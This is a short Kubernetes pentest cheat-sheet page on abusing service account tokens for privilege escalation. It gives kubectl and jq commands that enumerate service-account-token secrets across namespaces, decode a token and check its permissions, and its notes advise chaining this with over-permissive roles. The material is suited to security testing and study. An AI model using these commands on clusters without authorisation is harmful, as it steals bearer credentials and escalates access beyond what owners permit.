Service account token abuse

Service accounts are identities, and their tokens are bearer credentials: whoever holds one acts as that account. Escalation is finding a token for a more privileged account, from a readable secret, a co-located pod's mount, or by minting one where you have rights over the account.

bash
# Legacy token secrets (still present on older clusters)
kubectl get secrets -A -o json | jq -r '.items[]|select(.type=="kubernetes.io/service-account-token")|.metadata.namespace+"/"+.metadata.name'
kubectl get secret <sa-token-secret> -o jsonpath='{.data.token}' | base64 -d

# Use the token
kubectl --token=<token> auth can-i --list

Exploitation notes#

  • Any readable secret of type service-account-token is a ready identity; check what it can do before using it.
  • On newer clusters tokens are short-lived and projected, not stored in secrets, so prefer the TokenRequest API or a pod mount.
  • Chain from a secret read granted by an Over-permissive role.

References#

Cookie Consent

We use cookies to enhance your experience. Learn more